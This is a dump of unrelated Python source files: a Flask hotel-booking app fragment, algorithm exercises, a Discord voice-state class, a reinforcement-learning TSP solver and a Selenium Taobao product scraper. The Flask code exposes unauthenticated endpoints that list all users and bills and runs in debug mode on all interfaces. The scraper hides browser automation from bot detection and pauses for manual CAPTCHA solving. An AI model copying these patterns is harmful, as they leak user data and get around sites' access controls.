Bill.query.filter_by(roomNumber=booking.roomNumber, userEmail= current_user.email, check_in_Date= booking.check_in_Date).first()\n\n \n db.session.add(room)\n db.session.delete(booking)\n db.session.delete(bill)\n\n db.session.delete(customer)\n db.session.delete(user)\n db.session.commit()\n flash(\"Your account has been successfully deleted.\")\n except:\n db.session.rollback()\n flash(\"You failed to delete your account\")\n return redirect (request.referrer)\n \n return redirect(\"/\")\n\n\n\n\n@app.route('/MyBill/', methods=['GET'])\n@login_required\ndef display_bill(roomNumber):\n \n if current_user.is_authenticated:\n user= User.query.filter_by(email= current_user.email).first()\n user= user.toDict()\n\n bill = Bill.query.filter_by(roomNumber= int(roomNumber)).first() \n\n return render_template('Userbill.html' , user = user , bill = bill)\n\n return redirect(\"/MyBookings\")\n\n@app.route('/MyBill//pay', methods=['POST'])\n@login_required\ndef pay_bill(roomNumber):\n bill = Bill.query.filter_by(roomNumber= int(roomNumber)).first() \n\n if bill== None:\n flash(\"An Invalid request was made.\")\n return redirect('/MyBookings')\n\n if bill.paid is True:\n flash(\"Your bill has already been paid.\")\n return redirect(request.referrer)\n\n bill.pay()\n try:\n db.session.add(bill)\n db.session.commit()\n flash(\"You have successful paid your bill.\")\n\n except: \n db.session.rollback()\n flash(\"Attempt to pay bill failed.\")\n\n return redirect(request.referrer)\n\n\n #TEST \n@app.route('/users', methods=['GET'])\ndef all_users():\n users= User.query.all();\n users= [user.toDict() for user in users]\n return jsonify(users)\n\n\n@app.route(\"/bills\", methods=[\"GET\"])\ndef display_bills():\n bills= Bill.query.all()\n bills= [bill.toDict() for bill in bills]\n return jsonify(bills)\n\n@app.route('/r') \ndef all_rooms():\n rooms= Room.query.all();\n rooms = [room.toDict() for room in rooms];\n return jsonify(rooms)\n\n@app.route('/b')\ndef display_book():\n return render_template('Book.html')\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8080, debug=True)\n\n\n","sub_path":"App/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"461281642","text":"\"\"\"\n子串不连续\n\"\"\"\n\n\nclass Solution:\n def minWindow(self, s: str, t: str) -> str:\n # need 需求字符出现次数,window窗口字符出现次数\n need = dict()\n window = dict()\n # need初始化字符为1,window初始化为0\n for i in t:\n need[i] = need.get(i, 0) + 1\n window[i] = window.get(i, 0)\n # 窗口区间\n left, right = 0, 0\n # 有效字符数量\n valid = 0\n # 记录覆盖最小字串的起始索引和长度\n start, str_len = 0, len(s) + 1\n # 增大窗口寻找可行解\n while right < len(s):\n # c是将移入窗口的字符串\n c = s[right]\n right += 1\n # 进行窗口内数据的操作\n if c in need:\n # 窗口内字符出现次数\n window[c] += 1\n # 记录有效次数\n if window[c] == need[c]:\n valid += 1\n # 减小窗口优化可行解,判断左侧窗口是否要收缩,有效次数==需求字符数量\n while valid == len(need):\n # 更新最小覆盖子串\n # 比上次短,才更新 right-left是匹配到字符串长度\n if right - left < str_len:\n start = left\n str_len = right - left\n # d是将移除窗口的字符\n d = s[left]\n left += 1\n if d in need:\n if window[d] == need[d]:\n valid -= 1\n window[d] -= 1\n if str_len == len(s) + 1:\n return \"\"\n return s[start:start + str_len]\n\n\nif __name__ == '__main__':\n # s = \"ADOBECODEBANC\"\n # t = \"ABC\"\n s = \"cabwefgewcwaefgcf\"\n t = \"cae\"\n result = Solution().minWindow(s=s, t=t)\n print(result)\n","sub_path":"hot/leetcode/76.最小覆盖子串/76.最小覆盖字串.py","file_name":"76.最小覆盖字串.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"545661828","text":"import sklearn\nfrom sklearn.model_selection import train_test_split\n\n\nclass data_split:\n\n def __init__(self, df):\n self.df = df\n self.split_data()\n\n def split_data(self):\n '''\n function to split data into train, test, validate data\n The dataframe is split into 15% test, then 85% train. \n The train data set is then further split into 20% validation\n and 80% train dataset. \n So the final result is 15% of original data = test\n about 15% of original data is validation,\n and 70% of original data is train. \n '''\n\n self.train, self.test = train_test_split(\n self.df, test_size=0.15, random_state=42)\n\n self.train, self.val = train_test_split(\n self.train, test_size=0.20, random_state=42)\n\n return self.train, self.test, self.val\n\n # function to split into target and features dataset.\n\n def get_target(self, target_feature):\n '''\n function to split into target and features dataset.\n Target = target from the dataframe. \n '''\n\n self.target = target_feature\n self.features = self.train.columns.drop(self.target)\n\n self.x_train = self.train[self.features]\n self.y_train = self.train[self.target]\n self.x_val = self.val[self.features]\n self.y_val = self.val[self.target]\n self.x_test = self.test[self.features]\n self.y_test = self.test[self.target]\n\n return self.x_train, self.y_train, self.x_val, self.y_val, self.x_test, self.y_test\n","sub_path":"lambdata_neha00k/train_val_test.py","file_name":"train_val_test.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"632865877","text":"#Matricula: EF03468\n#Nome: Alberto Elias Do Amaral Júnior\n#Disciplina: CCF 110 - Programação\n#Professor: José Augusto Miranda Nacif\n#Lista de Exercício: 2\n#Questão: 6\n\ni=5\nwhile i < 500:\n print(i)\n i = i + 5","sub_path":"Programação/Lista_2/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"95921900","text":"# -*- coding: utf-8 -*-\nimport sys\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\nfrom common import public\nimport json\n\n\nclass zhuanli_zhuanyi():\n \"\"\"万方专利\"\"\"\n need_check_ziduan = [\n u'company_name'\n ]\n\n def check_company_name(self, indexstr, ustr):\n ret = None\n try:\n bgxx = indexstr['bgxx']\n jsonbgxx = json.loads(bgxx)\n cmlist = []\n for bg in jsonbgxx:\n bgshixiang = bg[u'变更事项']\n if bgshixiang in (u'申请人', u'专利权人'):\n cm1 = bg.get(u'变更后权利人', None)\n cm2 = bg.get(u'变更前权利人', None)\n if cm1:\n cmlist.append(cm1)\n if cm2:\n cmlist.append(cm2)\n cmlist = u';'.join(cmlist)\n cmlist = cmlist.split(u';')\n if ustr and len(ustr):\n company_name_list = ustr.split(u';')\n else:\n company_name_list = []\n\n if set(company_name_list) != set(cmlist):\n ret = u'不一致,我的是-%s-' % (';'.join(cmlist))\n except Exception as e:\n ret = u'解析不出来'\n pass\n return ret\n\n\nif __name__ == '__main__':\n a = '{\"bbd_xgxx_id\": \"\", \"bbd_version\": \"1.0\", \"bbd_table\": \"zhuanli_zhuanyi\", \"bbd_dotime\": \"2016年06月14日\", \"bbd_source\": \"\", \"ipc_main_class\": \"B29C 70/42\", \"bbd_params\": \"\", \"bbd_xgxx_date\": \"2016年05月17日\", \"bbd_html\": \"\", \"bbd_customer_name\": \"bbd_dp_parse_user\", \"company_name\": \"上海日之升新技术发展有限公司;上海日之升科技有限公司\", \"bbd_type\": \"zhuanli_zhuanyi\", \"bbd_qyxx_branch\": \"[]\", \"bbd_uptime\": \"1.143944488E9\", \"bgxx\": \"[{\\\"变更事项\\\": \\\"申请人\\\", \\\"变更后权利人\\\": \\\"上海日之升科技有限公司\\\", \\\"变更前权利人\\\": \\\"上海日之升新技术发展有限公司\\\"}, {\\\"变更事项\\\": \\\"地址\\\", \\\"变更后权利人\\\": \\\"201107 上海市纪高路1399号1幢\\\", \\\"变更前权利人\\\": \\\"201109 上海市闵行区沪闵路3078号\\\"}]\", \"legal_announce_date\": \"2016年06月08日\", \"reg_effect_date\": \"2016年05月17日\", \"md5\": \"7fbc24bbc51490dbc2324b231834c266\", \"bbd_qyxx_company\": \"[\\\"上海日之升新技术发展有限公司\\\", \\\"上海日之升科技有限公司\\\"]\", \"law_state\": \"专利申请权、专利权的转移\", \"bbd_seed\": \"\", \"legal_status\": \"专利申请权的转移\", \"_id\": \"CN201310694393.6\", \"bbd_url\": \"\", \"application_code\": \"CN201310694393.6\"}'\n js = json.loads(a)\n # zhuanli_zhuanyi=zhuanli_zhuanyi()\n # print zhuanli_zhuanyi.check_company_name(json.loads(a),u\"广东轻工职业技术学院;广东轻工职业技术学院;广州市白云区芳祺化妆品厂\")\n","sub_path":"src/parse/zhuanli_zhuanyi.py","file_name":"zhuanli_zhuanyi.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"400354128","text":"__all__ = ('VoiceState', )\n\nfrom datetime import datetime\n\nfrom ...backend.export import include\n\nfrom ..utils import timestamp_to_datetime\n\nfrom .utils import create_partial_user_from_id\n\ncreate_partial_role_from_id = include('create_partial_role_from_id')\n\nclass VoiceState:\n \"\"\"\n Represents a user at a ``ChannelVoice``.\n \n Attributes\n ----------\n channel : ``ChannelVoice``\n The channel to where the user is connected to.\n deaf : `bool`\n Whether the user is deafen.\n is_speaker : `bool`\n Whether the user is suppressed inside of the voice channel.\n \n If the channel is a ``ChannelVoice``, it is always `False`, meanwhile it ``ChannelStage`` it can vary.\n mute : `bool`\n Whether the user is muted.\n requested_to_speak_at : `None` or `datetime`\n When the user requested to speak.\n \n Only applicable for ``ChannelStage``-s.\n self_deaf : `bool`\n Whether the user muted everyone else.\n self_mute : `bool`\n Whether the user muted itself.\n self_stream : `bool`\n Whether the user screen shares with the go live option.\n self_video : `bool`\n Whether the user sends video from a camera source.\n session_id : `str`\n The user's voice session id.\n user : ``User`` or ``Client``\n The voice state's respective user. If user caching is disabled it will be set as a partial user.\n \"\"\"\n __slots__ = ('channel', 'deaf', 'is_speaker', 'mute', 'requested_to_speak_at', 'self_deaf', 'self_mute', 'self_stream',\n 'self_video', 'session_id', 'user', )\n \n def __init__(self, data, channel):\n \"\"\"\n Creates a ``VoiceState`` object from the given data.\n \n Parameters\n ----------\n data : `dict` of (`str`, `Any`) items\n Voice state data received from Discord.\n channel : ``ChannelVoiceBase``\n The channel of the voice state.\n \"\"\"\n self.channel = channel\n self.user = create_partial_user_from_id(int(data['user_id']))\n self.session_id = data['session_id']\n self.mute = data['mute']\n self.deaf = data['deaf']\n self.self_deaf = data['self_deaf']\n self.self_mute = data['self_mute']\n self.self_stream = data.get('self_stream', False)\n self.self_video = data['self_video']\n \n requested_to_speak_at = data.get('request_to_speak_timestamp', None)\n if (requested_to_speak_at is not None):\n requested_to_speak_at = timestamp_to_datetime(requested_to_speak_at)\n \n self.is_speaker = not data.get('suppress', False)\n \n self.requested_to_speak_at = requested_to_speak_at\n \n @property\n def guild(self):\n \"\"\"\n Returns the voice state's respective guild.\n \n Returns\n -------\n guild : `None` or ``Guild``\n \"\"\"\n return self.channel.guild\n \n def _difference_update_attributes(self, data, channel):\n \"\"\"\n Updates the voice state and returns it's overwritten attributes as a `dict` with a `attribute-name` -\n `old-value` relation.\n \n Parameters\n ----------\n data : `dict` of (`str`, `Any`) items\n Voice state data received from Discord.\n channel : ``ChannelVoice``\n The channel of the voice state.\n \n Returns\n -------\n old_attributes : `dict` of (`str`, `Any`) items\n All item in the returned dictionary is optional.\n \n Returned Data Structure\n -----------------------\n +-----------------------+-----------------------+\n | Keys | Values |\n +=======================+=======================+\n | channel | ``ChannelVoice`` |\n +-----------------------+-----------------------+\n | deaf | `str` |\n +-----------------------+-----------------------+\n | is_speaker | `bool` |\n +-----------------------+-----------------------+\n | mute | `bool` |\n +-----------------------+-----------------------+\n | requested_to_speak_at | `None` or `datetime` |\n +-----------------------+-----------------------+\n | self_deaf | `bool` |\n +-----------------------+-----------------------+\n | self_mute | `bool` |\n +-----------------------+-----------------------+\n | self_stream | `bool` |\n +-----------------------+-----------------------+\n | self_video | `bool` |\n +-----------------------+-----------------------+\n \"\"\"\n old_attributes = {}\n \n if (self.channel is not channel):\n old_attributes['channel'] = self.channel\n self.channel = channel\n \n deaf = data['deaf']\n if self.deaf != deaf:\n old_attributes['deaf'] = self.deaf\n self.deaf = deaf\n \n mute = data['mute']\n if self.mute != mute:\n old_attributes['mute'] = self.mute\n self.mute = mute\n \n self_deaf = data['self_deaf']\n if self.self_deaf != self_deaf:\n old_attributes['self_deaf'] = self.self_deaf\n self.self_deaf = self_deaf\n \n self_video = data['self_video']\n if self.self_video != self_video:\n old_attributes['self_video'] = self.self_video\n self.self_video = self_video\n \n self_stream = data.get('self_stream', False)\n if self.self_stream != self_stream:\n old_attributes['self_stream'] = self.self_stream\n self.self_stream = self_stream\n \n self_mute = data['self_mute']\n if self.self_mute != self_mute:\n old_attributes['self_mute'] = self.self_mute\n self.self_mute = self_mute\n \n requested_to_speak_at = data.get('request_to_speak_timestamp', None)\n if (requested_to_speak_at is not None):\n requested_to_speak_at = timestamp_to_datetime(requested_to_speak_at)\n \n if self.requested_to_speak_at != requested_to_speak_at:\n old_attributes['requested_to_speak_at'] = self.requested_to_speak_at\n self.requested_to_speak_at = requested_to_speak_at\n \n is_speaker = not data.get('suppress', False)\n if self.is_speaker != is_speaker:\n old_attributes['is_speaker'] = self.is_speaker\n self.is_speaker = is_speaker\n \n return old_attributes\n \n def _update_attributes(self, data, channel):\n \"\"\"\n Updates the voice state with overwriting it's old attributes.\n \n Parameters\n ----------\n data : `dict` of (`str`, `Any`) items\n Voice state data received from Discord.\n channel : ``ChannelVoice``\n The channel of the voice state.\n \"\"\"\n self.channel = channel\n self.deaf = data['deaf']\n self.mute = data['mute']\n self.self_deaf = data['self_deaf']\n self.self_mute = data['self_mute']\n self.self_stream = data.get('self_stream', False)\n self.self_video = data['self_video']\n \n requested_to_speak_at = data.get('request_to_speak_timestamp', None)\n if (requested_to_speak_at is not None):\n requested_to_speak_at = timestamp_to_datetime(requested_to_speak_at)\n \n self.requested_to_speak_at = requested_to_speak_at\n \n self.is_speaker = not data.get('suppress', False)\n \n def __repr__(self):\n \"\"\"Returns the voice state's representation.\"\"\"\n return f'<{self.__class__.__name__} user={self.user.full_name!r}, channel={self.channel!r}>'\n","sub_path":"hata/discord/user/voice_state.py","file_name":"voice_state.py","file_ext":"py","file_size_in_byte":7924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"373178988","text":"import random as rand\nimport matplotlib.pyplot as plt\nimport math\nimport time\n\n# main variables\ngraph = [] # 노드들\nn = 0 # 노드의 개수\nq_value = [] # q value들\ninit_q = 10000.0\nvisited = [] # 방문했던 곳 배열 TRUE / FALSE\npath = [] # 현재까지 방문했던 곳 리스트\nc_city = 0 # 현재 위치\n\n\n# parameters\npr = 0.01 # exploit rate\nd_rate = 0.9 # discount rate\n\n# results\nbestTour = 0\nbestTourLength = 0\n\n\ndef data_init():\n global n, q_value, visited, c_city\n with open(\"_data1.txt\", \"r\") as f:\n lines = f.readlines()\n for line in lines:\n arr = line.split(\",\")\n f_arr = [float(val) for val in arr]\n graph.append(f_arr)\n f.close()\n\n n = len(graph)\n q_value = [[init_q] * n for _ in range(n)]\n visited = [0] * n\n c_city = rand.randrange(n) # random 시작지점\n\n\ndef get_distance(node1, node2):\n global graph\n x1 = graph[node1][0]\n y1 = graph[node1][1]\n x2 = graph[node2][0]\n y2 = graph[node2][1]\n return math.sqrt(pow(x1 - x2, 2) + pow(y1 - y2, 2))\n\n\ndef nearest_neighbor(node):\n town = -1\n min_value = get_distance(node, 0)\n for i in range(1, n):\n value = get_distance(node, i)\n if i != node and value < min_value:\n town = i\n return town\n\n\ndef solve():\n global n, bestTourLength, bestTour\n result_data = []\n start_time = time.time()\n for i in range(2000):\n init()\n move()\n update_best()\n result_data.append(bestTourLength)\n\n end_time = time.time()\n print(\"Time : \" + str(end_time - start_time))\n print(\"Best tour length : \" + str(bestTourLength))\n print(bestTour)\n plt.plot(result_data)\n plt.show()\n\n\n############################\n### main_method\n############################\ndef init():\n global visited, c_city, path\n visited = [0] * n\n path = []\n c_city = rand.randrange(n)\n visited[c_city] = True\n path.append(c_city)\n\n\ndef move():\n for i in range(n - 1): # 모든곳을 다 탐색할 때까지\n selected_town = select_next_town() # 이동할 도시 탐색\n visit_town(selected_town) # 이동 및 q-value 업데이트\n\n\ndef update_best():\n global bestTourLength, bestTour\n total_distance = 0\n for i in range(n):\n total_distance += get_distance(path[i - 1], path[i])\n\n if bestTourLength == 0 or total_distance < bestTourLength:\n bestTourLength = total_distance\n bestTour = path\n\n\n#######################\n### sub_method\n#######################\ndef select_next_town():\n # 모혐형 랜덤탐색\n if rand.random() < pr:\n while True:\n t = rand.randrange(n) # random town\n if not visited[t]:\n return t\n\n # 최소값 선택방식\n q_min = 0\n q_min_city = -1\n for next_city in range(n):\n if not visited[next_city] and (q_min == 0 or q_value[c_city][next_city] < q_min):\n q_min = q_value[c_city][next_city]\n q_min_city = next_city\n\n # if q_min_city == -1:\n # print(\"break\")\n\n return q_min_city\n\n\ndef visit_town(next_city):\n global c_city, path\n # visit\n visited[next_city] = True\n path.append(c_city)\n\n # q-value update\n q_value[c_city][next_city] = 0.1 * get_distance(c_city, next_city) + 0.9 * min(q_value[next_city])\n c_city = next_city\n\n\nif __name__ == \"__main__\":\n data_init()\n solve()","sub_path":"tsp_rl/RL_v2.py","file_name":"RL_v2.py","file_ext":"py","file_size_in_byte":3509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"173202231","text":"from selenium import webdriver\nimport sched\nimport time\nimport tkinter.messagebox # 弹窗库\nfrom tkinter import *\nfrom playsound import playsound\nimport re\nimport json\nimport pymysql\nimport random\nfrom selenium import common\nimport openpyxl\n\n\"\"\" 半自动实现 \"\"\"\n\n\ndef start(random_good):\n chrome_path = r'd:/driverAndPlugs/chromedriver.exe'\n mp3_path = r'd:/菊花台.mp3'\n options = webdriver.ChromeOptions()\n # 不加载图片\n options.add_experimental_option(\"prefs\", {\"profile.managed_default_content_settings.images\": 2})\n # 设置为开发者模式,防止被各大网站识别出来使用了Selenium window.navigator.webdriver 检测\n options.add_experimental_option('excludeSwitches', ['enable-automation'])\n chrome = webdriver.Chrome(executable_path=chrome_path, options=options)\n url = 'https://s.taobao.com/'\n chrome.get(url)\n # chrome.maximize_window() # 窗口最大化方便扫码\n ser_input = chrome.find_elements_by_xpath(\"//input[@name='q']\")[0]\n ser_input.send_keys(random_good)\n time.sleep(1)\n ser_btn = chrome.find_elements_by_xpath(\"//button\")[0]\n ser_btn.click()\n return chrome\n\n\n# 解析json数据\ndef json2info(json_):\n json_dic = json.loads(json_)\n try:\n good_items = json_dic['mods']['itemlist']['data']['auctions']\n except:\n print('筛选条件过多,搜索不到该商品!')\n return 1\n\n good_list = []\n for good_item in good_items:\n goods = {\n 'shop': good_item['nick'], # 店铺名\n 'title': good_item['raw_title'], # 宝贝标题\n 'price': good_item['view_price'], # 价格\n 'sales': good_item['view_sales'], # 销量\n 'freight': good_item['view_fee'], # 运费\n 'detail_url': good_item['detail_url'], # 详情页\n 'pic_url': good_item['pic_url']\n }\n good_list.append(goods)\n return good_list\n\n\n# 搜索爬取数据\ndef data_by_search(conn, cursor, etl_date, etl_time, chrome, search_good, crawl_type, pages):\n try:\n tb_input = chrome.find_elements_by_xpath(\"//input[@name='q']\")[0]\n tb_btn = chrome.find_elements_by_xpath(\"//button\")[0]\n tb_input.clear()\n tb_input.send_keys(search_good)\n tb_btn.click()\n time.sleep(random.randint(10, 15))\n # 排序按钮 综合排序/销量/信用/价格从低到高/价格从高到低/总价从低到高/总价从高到��\n sort_btn = chrome.find_elements_by_xpath(\"//li/a[@data-key='sort']\")\n # 销量排序\n if crawl_type == 1: # 下一页不用再按销量排行和搜索\n sort_btn[1].click()\n time.sleep(random.randint(10, 15))\n # 价格100+\n # chrome.find_elements_by_xpath(\"//input[@class='J_SortbarPriceInput input']\")[0].send_keys(100)\n # time.sleep(1)\n # chrome.find_elements_by_xpath(\"//button\")[1].click()\n # time.sleep(random.randint(10, 15))\n except common.exceptions.WebDriverException as e:\n print('--webdriver异常: ', e)\n # playsound(mp3_path)\n tkinter.messagebox.showinfo('tip', 'webdriver异常')\n # print(\"关闭弹窗休息200s\")\n # time.sleep(200)\n tb_input = chrome.find_elements_by_xpath(\"//input[@name='q']\")[0]\n tb_btn = chrome.find_elements_by_xpath(\"//button\")[0]\n tb_input.clear()\n tb_input.send_keys(search_good)\n tb_btn.click()\n time.sleep(random.randint(10, 15))\n sort_btn = chrome.find_elements_by_xpath(\"//li/a[@data-key='sort']\")\n if crawl_type == 1:\n sort_btn[1].click()\n time.sleep(random.randint(10, 15))\n\n # 下拉到底部\n chrome.execute_script('window.scrollTo(0, document.body.scrollHeight)')\n time.sleep(2)\n # 拉取html\n html = chrome.page_source\n json_ = re.findall(r'g_page_config = (.*?)}};', html)[0]\n if json_ == '':\n print('未搜索到: ', search_good)\n return\n json_ = json_ + '}}'\n # 分析json 写入数据库\n print(\"crawl: %s\" % search_good)\n good_list = json2info(json_)\n if good_list==1:\n return\n print('首页size: ', len(good_list))\n info2mysql(good_list, conn, cursor, etl_date, etl_time, search_good)\n # 下一页\n if pages == 1:\n return\n\n for page in range(0, pages - 1):\n # 下一页按钮不可用 返回\n totalPage = chrome.find_elements_by_xpath(\"//div[@class='pager']//ul[@class='items']//li/a[@class='link']/span[@class='icon icon-btn-next-2-disable']\") # 只有一页\n if len(totalPage) > 0:\n return\n try:\n next_btn = chrome.find_element_by_xpath('//li[@class=\"item next\"]//a')\n next_btn.click()\n time.sleep(random.randint(10, 15))\n except common.exceptions.WebDriverException as e:\n print('--webdriver异常: ', e)\n # playsound(mp3_path)\n tkinter.messagebox.showinfo('tip', 'webdriver异常')\n # print(\"关闭弹窗休息200s\")\n # time.sleep(200)\n next_btn = chrome.find_element_by_xpath('//li[@class=\"item next\"]//a') # 窗口长度不能缩小变短 加载不了下一页js\n next_btn.click()\n time.sleep(random.randint(10, 15))\n\n # 下拉到底部\n chrome.execute_script('window.scrollTo(0, document.body.scrollHeight)')\n # 拉取html\n html = chrome.page_source\n json_ = re.findall(r'g_page_config = (.*?)}};', html)[0]\n if json_ == '':\n print('翻页未搜索到: ', search_good)\n return\n json_ = json_ + '}}'\n # 分析json\n good_list = json2info(json_)\n print('第',page+2,'页size: ', len(good_list))\n # 写入数据库\n info2mysql(good_list, conn, cursor, etl_date, etl_time, search_good)\n\n\n# 插入数据库1\ndef info2mysql(good_list, conn, cursor, etl_date, etl_time, kw):\n # 一个good_list是一个网页数据 统一设置一个时间\n\n for good in good_list:\n shop = good['shop'] # 店铺名\n title = good['title'] # 宝贝标题\n price = float(good['price']) # 价格\n if '万' in good['sales']:\n sales = float(good['sales'].strip('+万人付款收货')) * 10000 # 销量\n else:\n sales = int(good['sales'].strip('+人付款收货')) # 销量\n if good['freight'] == '': # 运费\n freight = 0\n else:\n freight = float(good['freight'])\n\n detail_url = good['detail_url'] # 详情页\n pic_url = good['pic_url']\n\n # 不录入价格小于100 大于800的数据的数据\n # if price<100 or price>800:\n # continue\n # 这部分商品低价或者高价销量高是有研究价值的\n # sql语句\n del_sql = \"\"\"\n delete from goods where title = %s and etl_date = %s and shop =%s\n \"\"\"\n cursor.execute(del_sql, (title, etl_date, shop))\n conn.commit()\n insert_sql = \"\"\"\n insert into goods(shop,title,price,sales,freight,etl_date,etl_time,kw,detail_url,img_url) VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\n \"\"\"\n # 执行插入数据到数据库操作\n cursor.execute(insert_sql, (shop, title, price, sales, freight, etl_date, etl_time, kw, detail_url, pic_url))\n # 提交,不进行提交无法保存到数据库\n conn.commit()\n\n\n# 写入数据库2\ndef item2mysql(cursor, conn, item, good, etl_date, etl_time):\n insert_sql = \"\"\"\n insert into goods_shop(shop,price,title,sales,detail_url,img_url,kw,etl_date,etl_time) values (%s,%s,%s,%s,%s,%s,%s,%s,%s)\n \"\"\"\n cursor.execute(insert_sql, (\n item['shop'], item['price'], item['title'], item['sales'], item['detail_url'], item['pic_url'], good, etl_date,\n etl_time))\n conn.commit()\n\n\n# 爬取店铺所有\ndef all2mysql(cursor, conn, item, etl_date, etl_time):\n insert_sql = \"\"\"\n insert into goods_shop(shop,price,title,sales,detail_url,img_url,etl_date,etl_time) values (%s,%s,%s,%s,%s,%s,%s,%s)\n \"\"\"\n cursor.execute(insert_sql, (\n item['shop'], item['price'], item['title'], item['sales'], item['detail_url'], item['pic_url'], etl_date,\n etl_time))\n conn.commit()\n\n\ndef login(chrome):\n if chrome.current_url.startswith('https://login'):\n # tkinter.messagebox.showerror('提示', '请登录')\n print('未登录...')\n time.sleep(10)\n login(chrome)\n\n\n# 查询店铺\ndef sel_shops(cursor):\n # 数据库查询店铺及地址\n sel_sql = \"\"\"\n select * from shop where enable = 1\n \"\"\"\n cursor.execute(sel_sql)\n shop_list = cursor.fetchall()\n return shop_list\n\n\n# 根据店铺查询指定宝贝\ndef data_by_shop(chrome, good, shop):\n try:\n shop_input = chrome.find_elements_by_xpath(\"//input[@name='q']\")[0]\n shop_btn = chrome.find_elements_by_xpath(\"//button[2]\")[0]\n shop_input.send_keys(good)\n shop_btn.click()\n except common.exceptions.WebDriverException as e:\n print('--webdriver异常: ', e)\n tkinter.messagebox.showinfo('tip', 'webdriver异常')\n # 手动关闭滑块\n shop_input = chrome.find_elements_by_xpath(\"//input[@name='q']\")[0]\n shop_btn = chrome.find_elements_by_xpath(\"//button[2]\")[0]\n shop_input.send_keys(good)\n shop_btn.click()\n try:\n item = {\n 'shop': shop[1],\n 'price':\n chrome.find_elements_by_xpath(\"//div[@class='shop-hesper-bd grid']//div[@class='cprice-area']/span\")[\n 0].text,\n 'title':\n chrome.find_elements_by_xpath(\"//div[@class='shop-hesper-bd grid']//a[@class='item-name J_TGoldData']\")[\n 0].text,\n 'sales': chrome.find_elements_by_xpath(\"//div[@class='shop-hesper-bd grid']//div[@class='sale-area']/span\")[\n 0].text,\n 'detail_url':\n chrome.find_elements_by_xpath(\"//div[@class='shop-hesper-bd grid']//a[@class='item-name J_TGoldData']\")[\n 0].get_attribute('href'),\n 'pic_url': chrome.find_elements_by_xpath(\"//div[@class='shop-hesper-bd grid']//dt[@class='photo']//img\")[\n 0].get_attribute('src')\n }\n print(' %s' % good)\n except:\n print('未获取到: %s' % good)\n item = {\n 'shop': shop[1],\n 'price': 0,\n 'title': '无此商品',\n 'sales': 0,\n 'detail_url': 'null',\n 'pic_url': 'null'\n }\n return item\n\n\ndef read_goods_by_excel():\n # 读取excel中的数据\n # 第一步:打开工作簿\n wb = openpyxl.load_workbook('D:\\workSpaceXD\\MyTarget\\goods.xlsx')\n # 第二步:选取表单\n sh = wb['Sheet1']\n # 第三步:读取数据\n # 参数 row:行 column:列\n ce = sh.cell(row=1, column=1) # 读取第一行,第一列的数据\n # print(ce.value)\n # 按行读取数据 list(sh.rows)\n # print(list(sh.rows)[1:])\n # 按行读取数据,去掉第一行的表头信息数据\n switch_list = []\n ps4_list = []\n search_goods = []\n for cases in list(sh.rows)[1:]:\n if cases[0].value is not None:\n case_switch = 'switch ' + cases[0].value\n switch_list.append(case_switch)\n search_goods.append(case_switch)\n\n if cases[2].value is not None:\n case_ps4 = 'ps4 ' + cases[2].value\n ps4_list.append(case_ps4)\n search_goods.append(case_ps4)\n\n # 关闭工作薄\n wb.close()\n return search_goods\n\n\n# 爬取店铺所有商品\ndef crawl_all_f_shop(chrome, shop, cursor, conn, etl_date, etl_time):\n totalPage = chrome.find_elements_by_xpath(\"//span[@class='page-info']\")\n if len(totalPage) == 0:\n time.sleep(10)\n return\n total = totalPage[0].text\n total = int(total.split('/')[1])\n error_str = []\n for page in range(1, total + 1):\n try:\n dl_list = chrome.find_elements_by_xpath(\"//dl//img\") # 多少张图就有多少宝贝 dl与宝贝数不一致\n if len(dl_list) == 0:\n print('网速较慢', 'slow--' * 10)\n chrome.refresh()\n time.sleep(random.randint(10, 15))\n dl_list = chrome.find_elements_by_xpath(\"//dl//img\")\n except common.exceptions.WebDriverException as e:\n print('--webdriver异常: ', e)\n # playsound(mp3_path)\n tkinter.messagebox.showinfo('tip', 'webdriver异常')\n print(\"关闭弹窗休息200s\")\n time.sleep(200)\n dl_list = chrome.find_elements_by_xpath(\"//dl//img\")\n # 手动关闭滑块\n # ------------------------------------------------------------------------\n price_list = chrome.find_elements_by_xpath(\"//dl//span[@class='c-price']\")\n title_list = chrome.find_elements_by_xpath(\"//dl//img\")\n sales_list = chrome.find_elements_by_xpath(\"//dl//span[@class='sale-num']\")\n detail_url = chrome.find_elements_by_xpath(\"//dl//a[@class='item-name J_TGoldData']\")\n\n for i in range(0, len(dl_list) - 1):\n title = title_list[i].get_attribute('alt')\n ret = re.sub(r'', '', title)\n ret2 = re.sub(r'', '', ret)\n if len(sales_list) == 0:\n good = {\n 'shop': shop[1],\n 'price': price_list[i].text,\n 'title': ret2,\n 'sales': 99999,\n 'detail_url': detail_url[i].get_attribute('href'),\n 'pic_url': title_list[i].get_attribute('src')\n }\n else:\n good = {\n 'shop': shop[1],\n 'price': price_list[i].text,\n 'title': ret2,\n 'sales': sales_list[i].text,\n 'detail_url': detail_url[i].get_attribute('href'),\n 'pic_url': title_list[i].get_attribute('src')\n }\n print(good)\n all2mysql(cursor, conn, good, etl_date, etl_time)\n print('--------爬取第%s' % page, '页结束---------')\n time.sleep(random.randint(10, 15))\n if page != total:\n try:\n next_btn = chrome.find_elements_by_xpath(\"//a[@class='J_SearchAsync next']\")[0]\n next_btn.click()\n except common.exceptions.WebDriverException as e:\n print('--webdriver异常: ', e)\n # playsound(mp3_path)\n tkinter.messagebox.showinfo('tip', 'webdriver异常') # 手动滑块\n print(\"关闭弹窗休息200s\")\n time.sleep(200)\n next_btn = chrome.find_elements_by_xpath(\"//a[@class='J_SearchAsync next']\")[0]\n next_btn.click()\n 